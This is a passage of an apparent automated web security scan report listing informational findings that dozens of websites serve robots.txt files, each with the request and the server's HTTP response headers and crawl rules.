Last-Modified: Mon, 04 Oct 2004 19:04:49 GMT
ETag: "2ce888-38-3e5a3d1989640"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /yahoo/
Disallow: /modemupgrade/

27.1386. http://www.rollingout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rollingout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rollingout.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:21:36 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-hppgikmp=39D20259C81E7F2EB0795D0FF453BF69; path=/
Last-Modified: Fri, 01 Apr 2011 17:26:59 GMT
Content-Length: 27

User-agent: *
Allow: /


27.1387. http://www.ronstire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronstire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ronstire.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:46 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Last-Modified: Tue, 28 Aug 2001 19:11:16 GMT
ETag: "44d0aa-37-3b8becd4"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /wwwstat/


27.1388. http://www.rooftopfilms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooftopfilms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rooftopfilms.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 05 Jun 2010 02:20:40 GMT
ETag: "2c0845e-18-4883f15fc0e00"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1389. http://www.rooms101.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rooms101.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rooms101.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 07 Mar 2011 21:33:45 GMT
ETag: "1b00620-2f-49deb40178040"
Accept-Ranges: bytes
Content-Length: 47
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /wp-admin/

27.1390. http://www.rotary.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rotary.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rotary.org

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 164
Date: Wed, 04 May 2011 03:37:25 GMT
Content-Type: text/plain
ETag: "{9AADC3D1-7469-4D27-8FF2-E9F356BC9400},1"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=86300, no-check
X-Powered-By: ASP.NET
Last-Modified: Tue, 08 Feb 2011 19:21:47 GMT
ResourceTag: rt:9AADC3D1-7469-4D27-8FF2-E9F356BC9400@00000000001
Exires: Tue, 19 Apr 2011 03:37:25 GMT
Cache-Control: private,max-age=0
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: BIGipServermoss_80=3850832394.20480.0000; path=/
Set-Cookie: BIGipServerrotary.org_80=3574272172.20480.0000; path=/

User-agent: *
Disallow: /selfservice/
Disallow: /securedg/
Disallow: /securememberservices/
Disallow: /secureselfservice/
Allow: /
Disallow: /nominations/


27.1391. http://www.route59.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.route59.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.route59.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:00 GMT
Server: Apache
Last-Modified: Sat, 11 Sep 2010 04:00:38 GMT
Accept-Ranges: bytes
Content-Length: 106
X-Robots-Tag: noindex, nofollow
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

27.1392. http://www.rr-bb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rr-bb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rr-bb.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:47:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 10 Sep 2007 04:24:09 GMT
ETag: "c6c08e-1d-439c05c20cc40"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain

User-agent: Slurp
Disallow: /

27.1393. http://www.rrproducts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rrproducts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rrproducts.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Thu, 08 Jan 2009 02:09:04 GMT
Accept-Ranges: bytes
ETag: "02054143671c91:5897"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:43:38 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

27.1394. http://www.rtl.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rtl.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rtl.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:02 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 16:05:01 GMT
ETag: "18d80a90-10b6-4a1e89a5b4540"
Accept-Ranges: bytes
Content-Length: 4278
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /suche/google
Disallow: /block
Disallow: *format/html*
Disallow: *format/json*
Disallow: *format/xml*
Disallow: /commentmediaset/do
Disallow: /tools/
Disallow: /userkom
...[SNIP]...

27.1395. http://www.rugdoctor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rugdoctor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rugdoctor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:57 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 14:08:38 GMT
ETag: "a3-4716e580"
Accept-Ranges: bytes
Content-Length: 163
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 03:32:57 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

Sitemap: http://www.rugdoctor.com/sitemap.xml
Sitemap: http://rent.rugdoctor.com/sitemap.xml
Sitemap: http://buy.rugdoctor.com/sitemap.xml

27.1396. http://www.runningwarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.runningwarehouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.runningwarehouse.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:28:24 GMT
Server: 4D_WebSTAR_S/5.4.0 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 22 Feb 2006 13:20:04 GMT
Content-Length: 25
Content-Type: text/plain

User-agent: *
Disallow:

27.1397. http://www.rusticgirls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rusticgirls.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rusticgirls.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:01:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 14:55:20 GMT
ETag: "31521b-6d-7b6f2600"
Accept-Ranges: bytes
Content-Length: 109
X-Powered-By: PleskLin
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /extras/
Disallow: /wholesale/
Disallow: /essays/
User-agent: ia_archiver
Disallow: /

27.1398. http://www.rustysautosalvage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rustysautosalvage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rustysautosalvage.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Thu, 31 Mar 2011 12:58:16 GMT
ETag: "175810e-160-49fc6d8c56a00"
Accept-Ranges: bytes
Content-Length: 352
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /templates
Disallow: /landing

User-agent: Googlebot
Allow: /
Disallow: /templates
Disallow: /landing

User-agent: Adsbot-Google
Allow: /
Disallow: /templates

User-ag
...[SNIP]...

27.1399. http://www.rvforum.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rvforum.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rvforum.net

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:01:46 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "165-4b36a3f3-0"
Last-Modified: Sun, 27 Dec 2009 00:01:55 GMT
Content-Type: text/plain
Content-Length: 357

User-agent: *
Disallow: /administrator/
Disallow: /bbpress/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
D
...[SNIP]...

27.1400. http://www.rvntracker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rvntracker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rvntracker.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 28 Dec 2007 17:23:49 GMT
ETag: "4620140-1d-f522d340"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /rd/

27.1401. http://www.rvresources.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rvresources.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rvresources.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:43:43 GMT
Server: Apache
Last-Modified: Fri, 14 Jan 2011 02:21:24 GMT
ETag: "7d69e5-b6-4d2fb324"
Accept-Ranges: bytes
Content-Length: 182
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /stats/
Disallow: /statshistory/
Allow: /games/games.php
Disallow: /games/
Disallow: /goto/
Sitemap: http://www.rvresources.com/sitemap.xml

27.1402. http://www.ryobitools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ryobitools.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ryobitools.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Oct 2008 17:07:52 GMT
ETag: "a80fd4-cc-8a12ea00"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1403. http://www.saclibrarycatalog.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saclibrarycatalog.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.saclibrarycatalog.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:00:17 GMT
Server: III 100
MIME-version: 1.0
Last-Modified: Mon, 24 Mar 2008 19:36:28 GMT
Expires: Thu, 5 May 2011 02:00:17 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 2065
Vary: Accept-Encoding,User-Agent
Connection: close

# This file instructs all WWW robots NOT to index pages that begin
# with the URLS listed.
User-agent: *
Disallow: /acquire
Disallow: /airpac
Disallow: /airwkst
Disallow: /articles
Disallow: /availli
...[SNIP]...

27.1404. http://www.sailrite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailrite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sailrite.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:39 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 134
NS_RTIMER_COMPOSITE: -693499428:73686F702D6A6176613033372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2010.2.0; domain=www.sailrite.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=956
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /lowell-wholesale/
Disallow: /images/
Disallow: /email-promotions/
Disallow: /promo/
Crawl-Delay: 10

27.1405. http://www.salusuniforms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.salusuniforms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.salusuniforms.com

Response

HTTP/1.1 200 OK
Content-Length: 322
Content-Type: text/plain
Last-Modified: Mon, 23 Jun 2008 23:26:00 GMT
Accept-Ranges: bytes
ETag: "0b4d17e88d5c81:418"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:52:05 GMT
Connection: close

User-Agent: *
Disallow: /Admin/
Disallow: /App_Themes/
Disallow: /Assets/
Disallow: /Checkout/
Disallow: /ClientApi/
Disallow: /ConLib/
Disallow: /FCKeditor/
Disallow: /images/
Disallow: /Ins
...[SNIP]...

27.1406. http://www.sampleaday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sampleaday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sampleaday.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://sampleaday.com/xmlrpc.php
Set-Cookie: wwsgd_visits=1; expires=Thu, 03-May-2012 01:31:06 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1407. http://www.samplewords.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.samplewords.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.samplewords.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:43 GMT
Server: Apache
Last-Modified: Tue, 17 Oct 2006 18:16:38 GMT
Accept-Ranges: bytes
Content-Length: 23
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1408. http://www.sandicor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandicor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sandicor.com

Response

HTTP/1.1 200 OK
Content-Length: 72
Content-Type: text/plain
Last-Modified: Thu, 03 Jun 2010 19:04:07 GMT
Accept-Ranges: bytes
ETag: "bacaad8a4f3cb1:1341"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:57:45 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.sandicor.com/sitemap.xml

27.1409. http://www.sangres.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sangres.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sangres.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:18 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 29 Jan 2010 05:19:04 GMT
ETag: "16-47e46c6258200"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.1410. http://www.sanook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sanook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sanook.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 21 May 2009 09:01:23 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 96
Date: Wed, 04 May 2011 02:39:08 GMT
Age: 78022
Connection: close
Via: SanookFP5
X-Sanook: 1566111815 1565126636

User-agent: *
Disallow: /SMI/
Disallow: /mwebmonitor/
Sitemap: http://www.sanook.com/sitemap.xml

27.1411. http://www.sas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:38 GMT
Server: Apache
Last-Modified: Fri, 03 Sep 2010 15:33:26 GMT
ETag: "4da-48f5ca6db5d80"
Accept-Ranges: bytes
Content-Length: 1242
Connection: close
Content-Type: text/plain

#
# robots.txt file for www.sas.com
#
# ----------------------------------
# History:
# edds 05sep2003 added entry for /ctx
# edds 05sep2003 removed User-agent: Slurp; Disallow: /apps/
#
...[SNIP]...

27.1412. http://www.saveonpoolsupplies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saveonpoolsupplies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.saveonpoolsupplies.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:54:59 GMT
Content-Length: 96350
Content-Type: text/plain
Last-Modified: Thu, 17 Feb 2011 19:32:40 GMT
Accept-Ranges: bytes
ETag: "8361b470d9cecb1:c3cd"
Server: WWW Server/1.1
X-Powered-By: ASP.NET

User-agent: *
Disallow: /Backyard-and-Home/Garage-and-Home-Improvement/Air-Conditioner-Cover/
Disallow: /Backyard-and-Home/Garage-and-Home-Improvement/Attic-Dek-Storage-System/
Disallow: /Backyard-
...[SNIP]...

27.1413. http://www.sbc.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sbc.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sbc.net

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Cache-Control: max-age=1800
Expires: Wed, 04 May 2011 03:32:59 GMT
Date: Wed, 04 May 2011 03:02:59 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sat, 01 Jan 2005 08:20:50 GMT
ETag: "5c36afcddaefc41:ae0"
Content-Length: 84

User-agent: *
Disallow: /churchsearch/    # This is an infinite virtual URL space


27.1414. http://www.scarletknights.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scarletknights.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scarletknights.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 17 Dec 2010 20:30:12 GMT
Accept-Ranges: bytes
ETag: "507fee34299ecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:43:14 GMT
Connection: close
Content-Length: 198

User-agent: User-agent: *
Disallow: /admin/
Disallow: /sspro/
Disallow: /sspro_director/
Disallow: /templates/
Disallow: /update/
Disallow: /banmanpro/
Disallow: /scarletr/
Disallow: /crew/

27.1415. http://www.sccgov.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sccgov.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sccgov.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Last-Modified: Fri, 29 Apr 2011 22:14:21 GMT
ETag: "1806-210-4a215fee3ee2b"
Accept-Ranges: bytes
Content-Length: 528
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /*print?contentId
Disallow: /*printcontacts?print
Disallow: /*email?article
Disallow: /*Authenticate.aspx
Disallow: /portal/site/phd
Disallow: /SCC/docs/Public%20Health%20Depar
...[SNIP]...

27.1416. http://www.scholarshipprovider.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scholarshipprovider.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scholarshipprovider.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:48 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9
Last-Modified: Fri, 30 Apr 2010 18:33:39 GMT
ETag: "e3858-1d1-485787b5b66c0"
Accept-Ranges: bytes
Content-Length: 465
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# This allows all robots to index the site.
User-agent: *
Disallow: /form.php
Disallow: /tips-for-moms-in-school
Disallow: /college-moms
Disallow: /free-money-for-school
Disallow: /student-loans
Disal
...[SNIP]...

27.1417. http://www.sciencelinks.jp/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sciencelinks.jp
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sciencelinks.jp

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:40 GMT
Server: Apache
Last-Modified: Fri, 02 May 2008 00:58:09 GMT
ETag: "1df1f71-11e-44c34e01f4a40"
Accept-Ranges: bytes
Content-Length: 286
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

27.1418. http://www.scientificsonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientificsonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scientificsonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:08:44 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 13:50:08 GMT
ETag: "422cfc-48a-49101a8184400"
Accept-Ranges: bytes
Content-Length: 1162
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

27.1419. http://www.scientology.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientology.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scientology.org

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 14 Mar 2011 18:43:16 GMT
ETag: "17aa0ff-697-49e75af48f900"
Content-Type: text/plain
Date: Wed, 04 May 2011 02:09:26 GMT
Content-Length: 1687
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1420. http://www.sconestop.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sconestop.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sconestop.org

Response

HTTP/1.1 200 OK
Content-Length: 113
Content-Type: text/plain
Last-Modified: Tue, 08 Jul 2008 03:19:53 GMT
Accept-Ranges: bytes
ETag: "8012ec7ca9e0c81:ed2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:12:40 GMT
Connection: close

# Visit http://www.robotstxt.org/wc/faq.html for more information about this file

User-agent: *
Disallow: /

27.1421. http://www.scoresandodds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scoresandodds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scoresandodds.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 02 Sep 2010 16:36:03 GMT
ETag: "3e4b95-1f-48f4968fd1c8d"
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 00:47:24 GMT
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 31
Date: Wed, 04 May 2011 00:47:24 GMT
X-Varnish: 557047690
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /stats/

27.1422. http://www.scott-sports.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scott-sports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scott-sports.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:09 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 20:31:35 GMT
ETag: "fe4a50-a1-4878528fe57c0"
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /engine/
Crawl-delay: 120
Request-rate: 1/10
Visit-time: 0100-0500

User-agent: msnbot
Crawl-delay: 5

User-agent: Slurp
Crawl-delay: 5

27.1423. http://www.scrapblog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scrapblog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scrapblog.com

Response

HTTP/1.1 200 OK
Content-Length: 32
Content-Type: text/plain
Content-Location: http://www.scrapblog.com/robots.txt
Last-Modified: Thu, 02 Oct 2008 00:01:13 GMT
Accept-Ranges: bytes
ETag: "f42411fc2124c91:2994"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:19:51 GMT
Connection: close

User-agent: *
Disallow: /*.axd$

27.1424. http://www.screenhead.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.screenhead.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.screenhead.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:42:19 GMT
Server: Apache/2.2.17
X-Pingback: http://www.screenhead.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1425. http://www.screwfix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.screwfix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.screwfix.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:24 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:50:03 GMT
ETag: "4c7232-cd-44cdc4c0"
Accept-Ranges: bytes
Content-Length: 205
Vary: Accept-Encoding,User-Agent
